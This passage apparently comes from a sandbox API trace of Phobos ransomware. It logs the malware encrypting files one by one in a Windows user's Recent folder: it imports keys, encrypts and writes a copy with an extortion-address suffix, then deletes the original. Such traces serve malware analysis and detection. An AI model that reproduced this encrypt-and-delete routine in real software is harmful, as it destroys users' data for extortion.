HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.265] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.266] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.266] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.266] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe54, lpOverlapped=0x0) returned 1 [0201.331] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe60, dwBufLen=0xe60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe60) returned 1 [0201.331] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe60, lpOverlapped=0x0) returned 1 [0201.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0201.332] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.332] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.332] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.332] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.332] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.332] CloseHandle (hObject=0x178) returned 1 [0201.332] CloseHandle (hObject=0x124) returned 1 [0201.332] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk")) returned 1 [0201.333] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.334] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3684) returned 1 [0201.334] CloseHandle (hObject=0x124) returned 1 [0201.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk")) returned 0x20 [0201.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.335] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.335] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.336] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.336] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe64, lpOverlapped=0x0) returned 1 [0201.339] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe70, dwBufLen=0xe70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe70) returned 1 [0201.341] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe70, lpOverlapped=0x0) returned 1 [0201.342] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0201.342] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.342] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.342] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.343] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.343] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.343] CloseHandle (hObject=0x124) returned 1 [0201.343] CloseHandle (hObject=0x178) returned 1 [0201.343] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\svqOj60.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\svqoj60.lnk")) returned 1 [0201.344] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.351] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5279) returned 1 [0201.351] CloseHandle (hObject=0x178) returned 1 [0201.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk")) returned 0x20 [0201.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.351] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.351] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.352] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.359] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.359] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x149f, lpOverlapped=0x0) returned 1 [0201.363] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x14a0, dwBufLen=0x14a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x14a0) returned 1 [0201.363] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x14a0, lpOverlapped=0x0) returned 1 [0201.364] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0201.364] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.364] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.364] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.364] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.364] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.364] CloseHandle (hObject=0x178) returned 1 [0201.364] CloseHandle (hObject=0x124) returned 1 [0201.364] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t3r_xU_HAYRzhZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t3r_xu_hayrzhz.lnk")) returned 1 [0201.365] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.366] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=629) returned 1 [0201.367] CloseHandle (hObject=0x124) returned 1 [0201.367] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk")) returned 0x20 [0201.367] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.367] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.367] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.368] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.368] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.368] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x275, lpOverlapped=0x0) returned 1 [0201.369] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x280, dwBufLen=0x280 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x280) returned 1 [0201.370] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x280, lpOverlapped=0x0) returned 1 [0201.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0201.371] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.371] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0201.371] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.371] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0201.371] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.371] CloseHandle (hObject=0x124) returned 1 [0201.371] CloseHandle (hObject=0x178) returned 1 [0201.371] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t8p1dXbkwgDxC62lGDzr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t8p1dxbkwgdxc62lgdzr.lnk")) returned 1 [0201.372] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.373] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=574) returned 1 [0201.373] CloseHandle (hObject=0x178) returned 1 [0201.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk")) returned 0x20 [0201.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.374] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.374] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.385] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.385] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.385] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23e, lpOverlapped=0x0) returned 1 [0201.387] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x240, dwBufLen=0x240 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x240) returned 1 [0201.387] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x240, lpOverlapped=0x0) returned 1 [0201.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.479] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.480] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.480] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.480] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.546] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.546] CloseHandle (hObject=0x178) returned 1 [0201.546] CloseHandle (hObject=0x124) returned 1 [0201.546] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ThKXNc1XT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\thkxnc1xt.lnk")) returned 1 [0201.547] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ucGz58Fk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ucgz58fk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.548] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3699) returned 1 [0201.548] CloseHandle (hObject=0x124) returned 1 [0201.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 